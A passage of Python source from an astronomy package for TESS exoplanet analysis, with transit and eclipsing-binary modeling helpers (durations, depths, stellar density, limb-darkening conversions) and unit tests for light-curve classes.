def get_aper_mask_qlp(self, sap_mask="round"):
"""
This is an estimate of QLP aperture based on
self.hdulist[1].header['BESTAP']
See:
https://archive.stsci.edu/hlsps/qlp/hlsp_qlp_tess_ffi_all_tess_v1_data-prod-desc.pdf
"""
rad = float(self.header["BESTAP"].split(":")[0])
self.aper_radius = round(rad)
print(f"Estimating QLP aperture using r={rad} pix.")
if self.ffi_cutout is None:
# first download tpf cutout
self.ffi_cutout = FFI_cutout(
sector=self.sector,
gaiaDR2id=self.gaiaid,
toiid=self.toiid,
ticid=self.ticid,
search_radius=self.search_radius,
quality_bitmask=self.quality_bitmask,
)
self.tpf_tesscut = self.ffi_cutout.get_tpf_tesscut()
aper_mask = parse_aperture_mask(
self.tpf_tesscut, sap_mask=sap_mask, aper_radius=self.aper_radius
)
self.aper_mask = aper_mask
return aper_mask
```
#### File: chronos/chronos/transit.py
```python
r"""
helper functions for transit modeling
"""
import matplotlib.pyplot as pl
import numpy as np
from scipy.optimize import newton
from astropy import units as u
from astropy import constants as c
import batman
LOG_TWO_PI = np.log(2 * np.pi)
__all__ = ["get_likelihoods_mass_grid", "get_HEB_depth_from_masses"]
def get_likelihoods_mass_grid(
m1,
m2s,
m3s,
obs,
log10age,
tracks,
feh,
bands=["TESS", "J", "H", "K"],
b=0,
use_tshape=False,
obs_min=0,
obs_max=1,
occultation=False,
):
"""
compute model likelihood over a mass grid of secondary and tertiary
stars in a HEB system. See also `plot_likelihood_grid`.
Parameters
----------
m1 : float
central star mass
m2s : list
list of secondary star masses
m3s : list
list of tertiary star masses
tracks : str
MIST isochrones track from isochrone
obs : tuple
(value, error) of the parameter of interest e.g. observed transit depth
log10age : float
age of the system
feh : float
metallicity of the system
bands : list
list of band
"""
errmsg = "obs must be a tuple of (value, error)"
assert isinstance(obs, tuple), errmsg
mass_grids = {}
for bp in bands:
mass_grid = np.zeros((len(m3s), len(m2s)))
for i, m2 in enumerate(m2s):
for j, m3 in enumerate(m3s):
if occultation:
calc = get_HEB_depth_from_masses(
m1,
m2,
m3,
tracks,
log10age,
feh,
band=bp,
occultation=True,
)
else:
calc = get_HEB_depth_from_masses(
m1,
m2,
m3,
tracks,
log10age,
feh,
band=bp,
occultation=False,
)
if use_tshape:
calc = tshape_approx(np.sqrt(calc), b=b)
# calc = max_k(calc)
if (calc >= obs_min) & (calc <= obs_max):
ll = likelihood(calc, obs[0], obs[1])
else:
ll = np.nan
mass_grid[j, i] = ll
mass_grids[bp] = mass_grid
return mass_grids
def get_HEB_depth_from_masses(
mass1,
mass2,
mass3,
tracks,
log10age,
feh,
F0=1,
band="TESS",
occultation=False,
):
"""
compute the passband-dependent eclipse depth given masses of the hierarchical system,
assuming MIST, b=0, and m3 eclipsing m2
Parameters
----------
mass1, mass2, mass3 : float
mass components of an HEB
tracks : obj
MIST isochrones track from isochrone
log10age : float
age of the system
feh : float
metallicity of the system
F0 : float
flux contamination factor
band : str
band
occultation : bool
compute depth during occultation (default=False)
"""
band = band + "_mag"
star1 = tracks.generate(mass1, log10age, feh, return_dict=True)
mag1 = star1[band]
star2 = tracks.generate(mass2, log10age, feh, return_dict=True)
mag2 = star2[band]
star3 = tracks.generate(mass3, log10age, feh, return_dict=True)
mag3 = star3[band]
# rstar1 = star1["radius"]
rstar2 = star2["radius"]
rstar3 = star3["radius"]
# mag = -2.5*log10(F/F0)
f1 = F0 * 10 ** (-0.4 * mag1)
f2 = F0 * 10 ** (-0.4 * mag2)
f3 = F0 * 10 ** (-0.4 * mag3)
# total flux during out of transit/eclipse
f_out = f1 + f2 + f3
if occultation:
# flux during eclipse
f_in = f1 + f2
else:
# flux during transit
f_in = f1 + f2 - f2 * (rstar3 / rstar2) ** 2 + f3
return 1 - f_in / f_out
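# Minimal usage sketch (an assumption, not part of the original module): the
# `tracks` argument only needs to expose a
# `generate(mass, log10age, feh, return_dict=True)` method, as used above.
# With the isochrones package installed, one way to build such an object
# (interface assumed, please verify against your isochrones version) is:
#
# from isochrones import get_ichrone
# tracks = get_ichrone("mist", tracks=True)
# depth = get_HEB_depth_from_masses(
# 1.0, 0.5, 0.3, tracks, log10age=9.5, feh=0.0, band="TESS"
# )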
def get_EB_depth_from_masses(
mass1, mass2, tracks, log10age, feh, F0=1, band="TESS", occultation=False
):
"""
compute the passband-dependent eclipse depth given masses of the binary system,
assuming MIST, b=0, and m2 eclipsing m1
Parameters
----------
mass1, mass2 : float
mass components of an EB
tracks : obj
MIST isochrones track from isochrone
log10age : float
age of the system
feh : float
metallicity of the system
F0 : float
flux contamination factor
band : str
band
occultation : bool
compute depth during occultation (default=False)
"""
assert mass1 >= mass2
band = band + "_mag"
star1 = tracks.generate(mass1, log10age, feh, return_dict=True)
mag1 = star1[band]
star2 = tracks.generate(mass2, log10age, feh, return_dict=True)
mag2 = star2[band]
rstar1 = star1["radius"]
rstar2 = star2["radius"]
# mag = -2.5*log10(F/F0)
f1 = F0 * 10 ** (-0.4 * mag1)
f2 = F0 * 10 ** (-0.4 * mag2)
# total flux during out of transit/eclipse
f_out = f1 + f2
if occultation:
# flux during eclipse
f_in = f1
else:
# flux during transit
f_in = f1 - f1 * (rstar2 / rstar1) ** 2 + f2
return 1 - f_in / f_out
def likelihood(model, data, err):
return (1 / np.sqrt(2 * np.pi * err ** 2)) * np.exp(
-((data - model) / err) ** 2
)
def blackbody_temperature(bmag, vmag):
"""
calculate blackbody temperature using the Ballesteros formula; Eq. 14 in
https://arxiv.org/pdf/1201.1809.pdf
"""
t_bb = 4600 * (
(1 / (0.92 * (bmag - vmag) + 1.7))
+ (1 / (0.92 * (bmag - vmag) + 0.62))
)
return t_bb
def u_to_q(u1, u2):
"""convert limb-darkening coefficients from q to u
See Kipping 2013, eq. 15 & 16:
https://arxiv.org/pdf/1311.1170v3.pdf
"""
q1 = (u1 + u2) ** 2
q2 = u1 / (2 * (u1 + u2))
return q1, q2
def q_to_u(q1, q2):
"""convert limb-darkening coefficients from q to u
See Kipping 2013, eq. 17 & 18:
https://arxiv.org/pdf/1311.1170v3.pdf
"""
u1 = 2 * np.sqrt(q1) * q2
u2 = np.sqrt(q1) * (1 - 2 * q2)
return u1, u2
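# Quick consistency check (illustrative, not part of the original module):
# the two transformations are inverses, e.g. u_to_q(0.4, 0.2) gives
# (0.36, 1/3) and q_to_u(0.36, 1/3) recovers (0.4, 0.2) up to float error.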
def a_from_bkpt14(b, k, p, t14, i=np.pi / 2):
"""scaled semi-major axis [R_sun]
See Winn 2014 ("Transits and Occultations"), eq. 14
RpRs = 0.0092
Check: a_from_bkpt14(b=0, k=RpRs, p=365.25, t14=13/24, i=np.pi/2) = 216.6
"""
assert i < 3.15, "inc should be in radians"
numer = np.sqrt((k + 1) ** 2 - b ** 2)
denom = np.sin(i) * np.sin(t14 * np.pi / p)
return numer / denom
def i_from_abew(a, b, e=0, w=0):
"""Orbital inclination from the impact parameter, scaled semi-major axis, eccentricity and argument of periastron
See Winn 2014 ("Transits and Occultations"), eq. 7
Parameters
----------
b : impact parameter [-]
a : scaled semi-major axis [R_Star]
e : eccentricity [-]
w : argument of periastron [rad]
Returns
-------
i : inclination [rad]
Check: i_from_abew(a=216.6, b=0, e=0, w=0) = np.pi/2 = 1.57
"""
if (e != 0) | (w != 0):
return np.arccos(b / a * (1 + e * np.sin(w)) / (1 - e ** 2))
else:
return np.arccos(b / a)
def b_from_aiew(a, i, e=0, w=0):
"""impact parameter
See Seager & Mallen-Ornelas 2003, eq. 13
"""
return a * np.cos(i)
def t14_ecc(a, b, k, p, e, w, tr_sign=1):
r"""transit duration for eccentric orbit
RpRs = 0.0092
Check: t14_ecc(a=216.6, b=0, k=RpRs, p=365.25, e=0, w=np.pi, tr_sign=1)=0.54=13 hr
"""
# i = i_from_abew(a, b, e, w)
ae = np.sqrt(1.0 - e ** 2) / (1.0 + tr_sign * e * np.sin(w))
return t14_circ(a, b, k, p) * ae
def t14_circ(a, b, k, p):
"""transit duration for circular orbit
See Winn 2014 ("Transits and Occultations"), eq. 14
"""
i = i_from_abew(a, b)
alpha = np.sqrt((1 + k) ** 2 - b ** 2)
return (p / np.pi) * np.arcsin(alpha / np.sin(i) / a)
def t23_circ(a, b, k, p):
"""in-transit duration
See Winn 2014 ("Transits and Occultations"), eq. 15
"""
i = i_from_abew(a, b)
alpha = np.sqrt((1 - k) ** 2 - b ** 2)
return (p / np.pi) * np.arcsin(alpha / np.sin(i) / a)
def t14_from_abkp(a, b, k, p, e=0.0, w=0.0, tr_sign=1):
if (e != 0) | (w != 0):
return t14_ecc(a, b, k, p, e, w, tr_sign)
else:
return t14_circ(a, b, k, p)
def t14max_from_pmrr(p, ms, rs, rp):
"""Compute the maximum transit duration in days:
Eq. 10 in Hippke & Heller 2019
Parameters
----------
p : period [day]
ms : star mass [Msun]
rs : star radius [Rsun]
rp : planet radius [Rearth]
Returns
-------
t14 : transit duration [day]
"""
constant = 4 / (np.pi * c.G)
Porb = p * u.day
Ms = ms * u.Msun.to(u.kg) * u.kg
Rs = rs * u.Rsun.to(u.m) * u.m
Rp = rp * u.Rearth.to(u.m) * u.m
t14 = (Rp + Rs) * (constant * Porb / Ms) ** (1 / 3)
return t14.to(u.day).value
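# Worked example (illustrative, not from the original module):
# t14max_from_pmrr(p=365.25, ms=1, rs=1, rp=1) ~ 0.55 day (~13 hr), the
# maximum central transit duration for an Earth-Sun analog, consistent with
# the Check values quoted for the other duration helpers in this file.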
def t14_from_pmrr(p, ms, rs, rp, b=0, mp=0.0, e=0.0, w=0.0):
"""Compute the transit width (duration) in days.
Parameters
----------
p : period [day]
ms : star mass [Msun]
rs : star radius [Rsun]
rp : planet radius [Rearth]
b : impact parameter
e : eccentricity
w : argument of periastron [deg]
Returns
-------
t14 : transit duration [day]
Check: t14_from_pmrr(p=365.25, ms=1, rs=1, rp=1, b=0, e=0, w=0.1)=0.54
"""
sma = sma_from_pmm(p, ms, mp) * u.au.to(u.Rsun)
rp = rp * u.Rearth.to(u.m)
rs = rs * u.Rsun.to(u.m)
ms = ms * u.Msun.to(u.kg)
w = np.deg2rad(w)
return (
p
/ (np.pi * sma)
* np.sqrt((1 + rp / rs) ** 2 - b * b)
* (np.sqrt(1 - e ** 2) / (1 + e * np.sin(w)))
)
def sma_from_pmm(p, ms, mp=0):
""" Compute the semimajor axis in AU from Kepler's third law.
Parameters
----------
p : period [d]
ms : star mass [Msun]
mp : planet mass [Mearth]
Returns
-------
a : semi-major axis [au]
Check: sma_from_pmm(365.25, 1, 1) ~ 1 [au]
"""
G = c.G.value
p = p * u.day.to(u.second)
mp = mp * u.Mearth.to(u.kg)
ms = ms * u.Msun.to(u.kg)
a = (G * (ms + mp) * p ** 2 / (4 * np.pi ** 2)) ** (1.0 / 3)
return a * u.m.to(u.au)
def a_from_prho(p, rho, cgs=True):
"""Scaled semi-major axis from the stellar density and planet's orbital period.
Parameters
----------
period : orbital period [d]
rho : stellar density [g/cm^3]
Returns
-------
as : scaled semi-major axis [R_star]
Check: a_from_prho(p=365., rho=1.41) ~ 215
Note: 1*u.au.to(u.Rsun)=215
"""
if cgs:
rho = rho * u.g / u.cm ** 3
G = c.G.cgs
else:
rho = rho * u.kg / u.m ** 3
G = c.G
p = (p * u.day.to(u.second)) * u.second
aRs = ((rho * G * p ** 2) / (3 * np.pi)) ** (1 / 3)
return aRs.value
def sma_from_prhor(p, rho, rs):
"""Semi-major axis from the stellar density, stellar radius, and planet's orbital period.
Parameters
----------
rho : stellar density [g/cm^3]
p : orbital period [d]
rs : stellar radius [R_Sun]
Returns
-------
a : semi-major axis [AU]
Check: a_from_prhors(rho=1.41, p=365., rs=1.)=1
"""
return a_from_prho(p, rho) * rs * u.Rsun.to(u.au)
def p_from_am(sma, ms):
"""Orbital period from the semi-major axis and stellar mass.
Parameters
----------
sma : semi-major axis [AU]
ms : stellar mass [M_Sun]
Returns
-------
p : Orbital period [d]
Check: p_from_am(sma=1., ms=1.) ~ 365
"""
a = sma * u.au.to(u.m)
ms = ms * u.Msun.to(u.kg)
G = c.G.value
p = np.sqrt((4 * np.pi ** 2 * a ** 3) / (G * ms))
return p * u.second.to(u.day)
def tshape_approx(k, b=0):
"""transit shape approximation
See Seager & Mallen-Ornelas 2003, eq. 15
"""
alpha = (1 - k) ** 2 - b ** 2
beta = (1 + k) ** 2 - b ** 2
return (alpha / beta) ** 0.5
def max_k(tshape):
"""maximum depth due to contaminant
Seager & Mallen-Ornelas 2003, eq. 21
Check: max_k(ts)*u.Rsun.to(u.Rearth)=1
"""
return (1 - tshape) / (1 + tshape)
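# Worked example (illustrative): for k = 0.1 and b = 0,
# tshape_approx(0.1) = 0.9 / 1.1 ~ 0.818 and max_k(0.818) ~ 0.1, i.e. for a
# central transit the maximum radius ratio of a contaminating companion
# equals the observed radius ratio.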
def af_transit(e, w):
"""Calculates the -- factor during the transit"""
return (1.0 - e ** 2) / (1.0 + e * np.sin(w))
def rho_from_ap(a, p):
"""stellar density assuming circular orbit
See Kipping+2013, eq. 4:
https://arxiv.org/pdf/1311.1170v3.pdf
"""
p = p * u.d
gpcc = u.g / u.cm ** 3
rho_mks = 3 * np.pi / c.G / p ** 2 * a ** 3
return rho_mks.to(gpcc).value
def rho_from_mr(m, r):
"""
m: mass in Msun
r: radius in Rsun
returns
-------
density in g/cm3
"""
vol = (4 / 3) * np.pi * r * u.Rsun.to(u.cm) ** 3
return m * u.Msun.to(u.g) / vol
def rho_from_mr_cgs(m, r, unit="sun", cgs=True):
gcc = u.g / u.cm ** 3
kgmc = u.kg / u.m ** 3
if unit == "sun":
r = r * u.Rsun.to(u.m)
m = m * u.Msun.to(u.kg)
elif unit == "earth":
r = r * u.Rearth.to(u.m)
m = m * u.Mearth.to(u.kg)
elif unit == "jup":
r = r * u.Rjup.to(u.m)
m = m * u.Mjup.to(u.kg)
else:
raise ValueError("unit=[sun,earth,jup]")
volume = (4.0 / 3.0) * np.pi * r ** 3
rho = m / volume
if cgs:
return rho * kgmc.to(gcc)
else:
return rho
def rho_from_prrt(p, rs, rp, t14, b=0, cgs=False):
"""Compute the stellar density in units of the solar density (1.41 g/cm3)
from the transit parameters.
Parameters
----------
p : orbital period [day]
rp : planet radius [Rearth]
rs : star radius [Rsun]
t14 : transit duration [day]
b : impact parameter
Returns
-------
rho : stellar density [kg/m^3, or g/cm^3 if cgs=True]
rp, Rs, T, P = Rearth2m(rp_Rearth), Rsun2m(Rs_Rsun), days2sec(T_days), \
days2sec(P_days)
D = (rp / Rs)**2
rho = 4*np.pi**2 / (P*P*G) * (((1+np.sqrt(D))**2 - \
b*b*(1-np.sin(np.pi*T/P)**2)) / \
(np.sin(np.pi*T/P)**2))**(1.5) # kg/m3
"""
kgmc = u.kg / u.m ** 3
gcc = u.g / u.cm ** 3
G = c.G.value
rs = rs * u.Rsun.to(u.m)
rp = rp * u.Rearth.to(u.m)
t14 = t14 * u.day.to(u.second)
p = p * u.day.to(u.second)
rho = (
4
* np.pi ** 2
/ (G * p ** 2)
* (
((1 + rp / rs) ** 2 - b * b * (1 - np.sin(np.pi * t14 / p) ** 2))
/ (np.sin(np.pi * t14 / p) ** 2)
)
** (1.5)
) # kg/m3
if cgs:
return rho * kgmc.to(gcc)
else:
return rho
def logg_from_rhor(rho, r):
r = (r * u.R_sun).cgs
gpcc = u.g / u.cm ** 3
rho *= gpcc
g = 4 * np.pi / 3 * c.G.cgs * rho * r
return np.log10(g.value)
def logg_from_mr(mp, rp):
"""Compute the surface gravity from the planet mass and radius.
Parameters
----------
m : planet mass [Mearth]
r : planet radius [Rearth]
"""
G = c.G.value
mp = mp * u.Mearth.to(u.kg)
rp = rp * u.Rearth.to(u.m)
return np.log10(G * mp / (rp * rp) * 1e2)
def rho_from_gr(logg, r, cgs=True):
kgmc = u.kg / u.m ** 3
r = (r * u.R_sun).cgs
g = 10 ** logg * u.cm / u.s ** 2
rho = 3 * g / (r * c.G.cgs * 4 * np.pi)
if cgs:
return rho.value
else:
return rho.to(kgmc)
# def logg_southworth(P_days, K_ms, aRp, ecc=0.0, inc_deg=90.0):
# """Compute the surface gravity in m/s^2 from the equation in Southworth
# et al 2007."""
# P, inc = days2sec(P_days), unumpy.radians(inc_deg)
# return (
# 2
# * np.pi
# * K_ms
# * aRp
# * aRp
# * unumpy.sqrt(1 - ecc * ecc)
# / (P * unumpy.sin(inc))
# )
#
#
# def tcirc(P_days, Ms_Msun, mp_Mearth, rp_Rearth):
# """Compute the circularization timescale for a rocky planet
# in years. From Goldreich & Soter 1966."""
# Q = 1e2 # for a rocky exoplanet
# P, Ms, mp, rp, sma = (
# days2yrs(P_days),
# Msun2kg(Ms_Msun),
# Mearth2kg(mp_Mearth),
# Rearth2m(rp_Rearth),
# semimajoraxis(P_days, Ms_Msun, mp_Mearth),
# )
# return 2.0 * P * Q / (63 * np.pi) * mp / Ms * (AU2m(sma) / rp) ** 5
#
#
# def sample_rhostar(a_samples, p):
# """
# Given samples of the scaled semi-major axis and the period,
# compute samples of rhostar
# """
# rho = []
# n = int(1e4) if len(a_samples) > 1e4 else len(a_samples)
# for a in a_samples[np.random.randint(len(a_samples), size=n)]:
# rho.append(rho_from_mr(p, a).value)
# return np.array(rho)
#
#
# def sample_logg(rho_samples, rstar, urstar):
# """
# Given samples of the stellar density and the stellar radius
# (and its uncertainty), compute samples of logg
# """
# rs = rstar + urstar * np.random.randn(len(rho_samples))
# idx = rs > 0
# return logg(rho_samples[idx], rs[idx])
#
#
# def sample_ephem(orb, tc_samples, n=10000):
# tc_samples = np.array(tc_samples).T
# ephem = []
# for tc_s in tc_samples[np.random.randint(tc_samples.shape[0], size=n)]:
# ephem.append(stats.simple_ols(orb, tc_s))
# return np.array(ephem)
#
#
#
#
# def ll_normal_es(o, m, e):
# """Normal log likelihood for scalar err: average standard deviation."""
# return (
# -o.size * np.log(e)
# - 0.5 * o.size * LOG_TWO_PI
# - 0.5 * np.square(o - m).sum() / e ** 2
# )
#
#
# def ll_normal_ev(o, m, e):
# """Normal log likelihood for vector err"""
# return (
# -np.sum(np.log(e))
# - 0.5 * o.size * LOG_TWO_PI
# - 0.5 * np.sum((o - m) ** 2 / e ** 2)
# )
#
#
# class TransitModel:
# """Parameterization: k,q1,q2,tc,p,rho,b"""
#
# def __init__(self, time, e=0, w=0, ld_power="quadratic"):
# self.time = time
# self.transit_params = batman.TransitParams()
# self.transit_params.limb_dark = ld_power
# self.pv = None
# self.e = e
# self.w = w
#
# def compute_flux(self, param):
# """Transit model based on batman"""
# t0, p, k, rho, b, q1, q2 = [
# param.get(i) for i in "t0 p k rho b q1 q2".split()
# ]
# a = a_from_prho(p, rho)
# inc = np.rad2deg(i_from_abew(a, b, e=self.e, w=self.w))
#
# self.transit_params.t0 = t0
# self.transit_params.per = p
# self.transit_params.rp = k
# self.transit_params.a = a
# self.transit_params.inc = inc
# self.transit_params.u = q_to_u(q1, q2)
# self.transit_params.ecc = self.e
# self.transit_params.w = self.w
# m = batman.TransitModel(self.transit_params, self.time)
# return m.light_curve(self.transit_params)
#
#
# if __name__ == "__main__":
# time = np.linspace(-0.5, 0.5, 100)
# params = {
# "t0": 0.0,
# "p": 8.0,
# "k": 0.1,
# "rho": 1.41,
# "b": 0.1,
# "q1": 0.1,
# "q2": 0.1,
# }
#
# tm = TransitModel(time, e=0, w=0)
#
# model = tm.compute_flux(params)
# pl.plot(time, model, "-")
# pl.xlabel("Time [days]")
# pl.ylabel("Relative Flux")
# pl.show()
# https://gist.github.com/danhey/804a224d96823d0b3406a1c4118048c4
def from_geometry(dphi):
psi = newton(compute_psi, 0.5, args=(dphi,))
ecc = np.abs(ecc_func(psi))
w = argper(ecc, psi)
return ecc, w
def compute_psi(psi, dphi):
return psi - np.sin(psi) - 2 * np.pi * dphi
def ecc_func(psi):
return np.sin(0.5 * (psi - np.pi)) * (
1.0 - 0.5 * (np.cos(0.5 * (psi - np.pi))) ** 2
) ** (-0.5)
def argper(ecc, psi):
if ecc <= 0.0:
return 0.0
return np.arccos(
1.0 / ecc * (1.0 - ecc ** 2) ** 0.5 * np.tan(0.5 * (psi - np.pi))
)
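# Worked example (illustrative, not from the original module): a secondary
# eclipse exactly at phase 0.5 (dphi = 0.5) gives psi - sin(psi) = pi, whose
# solution is psi = pi, hence ecc = 0 and w = 0; from_geometry(0.5) is
# therefore expected to return (0.0, 0.0).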
def a_au(ms, p):
"""
ms : stellar mass [Solar]
p : period [days]
returns : semi-major axis [AU]
"""
return (ms * (p / 365.25) ** 2) ** (1.0 / 3.0)
def teq_k(teff, rs, a, a_b=0.3):
"""
teff : stellar effective temperature [Kelvin]
rs : stellar radius [Solar]
a : semi-major axis [AU]
a_b : bond albedo (unitless: highly irradiated gas giants = 0.3)
returns : equilibrium temperature [Kelvin]
"""
return ((1.0 - a_b) ** 0.25) * np.sqrt(rs / (2 * a * 215.094)) * teff
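# Worked example (illustrative): teq_k(teff=5772, rs=1, a=1, a_b=0.3) gives
# roughly 255 K, the familiar equilibrium temperature of the Earth for a
# Bond albedo of 0.3.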
pct_to_err = lambda x: (x[1], x[2] - x[1], x[1] - x[0])
# def lnlike(theta, t, f):
# """
# """
# k, t0, p, a, b, q1, q2, sig, c0, c1, c2, c3 = theta
# m = K2_transit_model(theta, t) + baseline(theta, t)
# resid = f - m
# inv_sigma2 = 1.0 / (sig ** 2)
#
# return -0.5 * (np.sum((resid) ** 2 * inv_sigma2 - np.log(inv_sigma2)))
#
#
# def lnprob(theta, t, f):
# """
# """
# k, t0, p, a, b, q1, q2, sig, c1, c2, c3, c4 = theta
# inc = np.arccos(b / a)
# if np.any(np.array(theta[:-4]) < 0):
# return -np.inf
# if inc > np.pi / 2.0:
# return -np.inf
#
# ll = lnlike(theta, t, f)
# return ll if np.isfinite(ll) else -np.inf
#
#
# def solve_w(obs, y):
# """
# solve for constant coefficients;
# sys_model is evaluate simply by np.dot(X,w)
# """
# X = np.c_[np.atleast_2d(obs).T]
# try:
# w = np.linalg.solve(np.dot(X.T, X), np.dot(X.T, y))
# except:
# w = np.linalg.lstsq(X, y)
# return w, X
#
#
# def systematics_model(w, aux_vec, time):
# """
# systematics model consists of linear combination
# of constant coefficients (computed here)
# and auxiliary vectors:
#
# top n observables, vert_offset, time
#
# The functional form of the model is
# s = w0+w1X1+w2X2+...+wnXn
# """
#
# vert_offset = np.ones_like(time)
# # construct X with time
# X = np.c_[np.concatenate((vert_offset[None, :], time[None, :], aux_vec)).T]
#
# # compute systematics model
# sys_model = np.dot(X, w)
#
# # make sure no nan
# # assert np.any(~np.isnan(sys_model))
#
# return sys_model
# def RM_K(vsini_kms, rp_Rearth, Rs_Rsun):
# '''Compute the approximate semi-amplitude for the Rossiter-McLaughlin
# effect in m/s.'''
# D = (Rearth2m(rp_Rearth) / Rsun2m(Rs_Rsun))**2
# return (vsini_kms*D / (1-D)) * 1e3
#
# def logg_model(mp_Mearth, rp_Rearth):
# '''Compute the surface gravity from the planet mass and radius.'''
# mp, rp = Mearth2kg(mp_Mearth), Rearth2m(rp_Rearth)
# return np.log10(G*mp/(rp*rp) * 1e2)
#
#
# def logg_southworth(P_days, K_ms, aRp, ecc=0., inc_deg=90.):
# '''Compute the surface gravity in m/s^2 from the equation in Southworth
# et al 2007.'''
# P, inc = days2sec(P_days), unumpy.radians(inc_deg)
# return 2*np.pi*K_ms*aRp*aRp * unumpy.sqrt(1-ecc*ecc) / (P*unumpy.sin(inc))
#
#
# def tcirc(P_days, Ms_Msun, mp_Mearth, rp_Rearth):
# '''Compute the circularization timescale for a rocky planet
# in years. From Goldreich & Soter 1966.'''
# Q = 1e2 # for a rocky exoplanet
# P, Ms, mp, rp, sma = days2yrs(P_days), Msun2kg(Ms_Msun), \
# Mearth2kg(mp_Mearth), Rearth2m(rp_Rearth), \
# semimajoraxis(P_days, Ms_Msun, mp_Mearth)
# return 2.*P*Q/(63*np.pi) * mp/Ms * (AU2m(sma) / rp)**5
#
#
# def transmission_spectroscopy_depth(Rs_Rsun, mp_Mearth, rp_Rearth, Teq, mu,
# Nscaleheights=5):
# '''Compute the expected signal in transit spectroscopy in ppm assuming
# the signal is seen at 5 scale heights.'''
# g = 10**logg_model(mp_Mearth, rp_Rearth) * 1e-2
# rp = Rearth2m(rp_Rearth)
# D = (rp / Rsun2m(Rs_Rsun))**2
# H = kb*Teq / (mu*mproton*g)
# return Nscaleheights * 2e6 * D * H / rp
#
#
# def stellar_density(P_days, T_days, Rs_Rsun, rp_Rearth, b):
# '''Compute the stellar density in units of the solar density (1.41 g/cm3)
# from the transit parameters.'''
# rp, Rs, T, P = Rearth2m(rp_Rearth), Rsun2m(Rs_Rsun), days2sec(T_days), \
# days2sec(P_days)
# D = (rp / Rs)**2
# rho = 4*np.pi**2 / (P*P*G) * (((1+np.sqrt(D))**2 - \
# b*b*(1-np.sin(np.pi*T/P)**2)) / \
# (np.sin(np.pi*T/P)**2))**(1.5) # kg/m3
# rhoSun = 3*Msun2kg(1) / (4*np.pi*Rsun2m(1)**3)
# return rho / rhoSun
#
#
# def astrometric_K(P_days, Ms_Msun, mp_Mearth, dist_pc):
# '''Compute the astrometric semi-amplitude in micro-arcsec.'''
# P, Ms, mp, dist = days2sec(P_days), Msun2kg(Ms_Msun), \
# Mearth2kg(mp_Mearth), pc2m(dist_pc)
# Krad = (G*P*P / (4*np.pi*np.pi*Ms*Ms))**(1./3) * mp /dist
# return np.rad2deg(Krad) * 3.6e3 * 1e6
#
#
# def is_Lagrangestable(Ps, Ms, mps, eccs):
# '''Compute if a system is Lagrange stable (conclusion of barnes+
# greenberg 06).
# mp_i = Mearth'''
# Ps, mps, eccs = np.array(Ps), np.array(mps), np.array(eccs)
# smas = AU2m(semimajoraxis(Ps, Ms, mps))
# stable = np.zeros(mps.size-1)
# for i in range(1, mps.size):
# mu1 = Mearth2kg(mps[i-1]) / Msun2kg(Ms)
# mu2 = Mearth2kg(mps[i]) / Msun2kg(Ms)
# alpha = mu1+mu2
# gamma1 = np.sqrt(1-float(eccs[i-1])**2)
# gamma2 = np.sqrt(1-float(eccs[i])**2)
# delta = np.sqrt(smas[i]/smas[i-1])
# deltas = np.linspace(1.000001, delta, 1e3)
# LHS = alpha**(-3.) * (mu1 + mu2/(deltas**2)) * \
# (mu1*gamma1 + mu2*gamma2*deltas)**2
# RHS = 1. + 3**(4./3) * mu1*mu2/(alpha**(4./3))
# fint = interp1d(LHS, deltas, bounds_error=False, fill_value=1e8)
# deltacrit = fint(RHS)
# stable[i-1] = True if delta >= 1.1*deltacrit else False
# return stable
# dphi = ph_secondary - ph_primary
# geom_ecc, geom_per0 = from_geometry(dphi)
```
#### File: chronos/tests/test_diamante.py
```python
from matplotlib.axes import Axes
import lightkurve as lk
from chronos import Diamante
TICID = 460205581
TOIID = 837
SECTOR = 10
QUALITY_BITMASK = "default"
d = Diamante(
ticid=TICID,
# toiid=TOIID,
# sector=SECTOR,
lc_num=1,
aper_radius=2,
# quality_bitmask=QUALITY_BITMASK,
)
def test_diamante_init():
assert isinstance(d.lc, lk.LightCurve)
def test_diamante_plot():
ax = d.lc.plot()
assert isinstance(ax, Axes)
```
#### File: chronos/tests/test_gls.py
```python
from chronos import LongCadence, Gls
TICID = 460205581
SECTOR = 10
def test_gls():
"""
"""
sc = LongCadence(ticid=TICID, sector=SECTOR)
lc = sc.make_custom_lc()
data = lc.time, lc.flux, lc.flux_err
gls = Gls(data, Pbeg=1, verbose=False)
assert isinstance(gls.best, dict)
# fig = gls.plot(block=True)
# fig = gls.plot(block=False)
# assert isinstance(fig, Figure)
```
#### File: chronos/tests/test_lightcurve.py
```python
import lightkurve as lk
# from matplotlib.figure import Figure
from matplotlib.axes import Axes
from chronos import Tess, ShortCadence, LongCadence
TOIID = 837
TICID = 460205581
SECTOR = 10
CUTOUT_SIZE = (15, 15)
QUALITY_BITMASK = "default"
def test_tess_methods():
t = Tess(toiid=TOIID)
ax = t.plot_pdc_sap_comparison()
assert isinstance(ax, Axes)
lcs = t.get_lightcurves()
assert isinstance(lcs, lk.LightCurve)
def test_sc_pipeline():
"""
"""
sc = ShortCadence(
ticid=TICID, sap_mask="pipeline", quality_bitmask=QUALITY_BITMASK
)
_ = sc.get_lc()
assert isinstance(sc.lc_pdcsap, lk.LightCurve)
assert isinstance(sc.lc_sap, lk.LightCurve)
def test_sc_square():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="square",
aper_radius=1,
threshold_sigma=5,
percentile=95,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "square"
def test_sc_round():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="round",
aper_radius=1,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "round"
def test_sc_threshold():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="threshold",
threshold_sigma=5,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "threshold"
def test_sc_percentile():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="percentile",
percentile=90,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "percentile"
def test_sc_triceratops():
"""
"""
sc = ShortCadence(ticid=TICID, calc_fpp=True)
# df = sc.get_NEB_depths()
# df = sc.get_fpp(flat=flat, plot=False)
assert sc.triceratops is not None
def test_lc():
"""
"""
lc = LongCadence(
ticid=TICID,
sap_mask="square",
aper_radius=1,
cutout_size=CUTOUT_SIZE,
quality_bitmask=QUALITY_BITMASK,
)
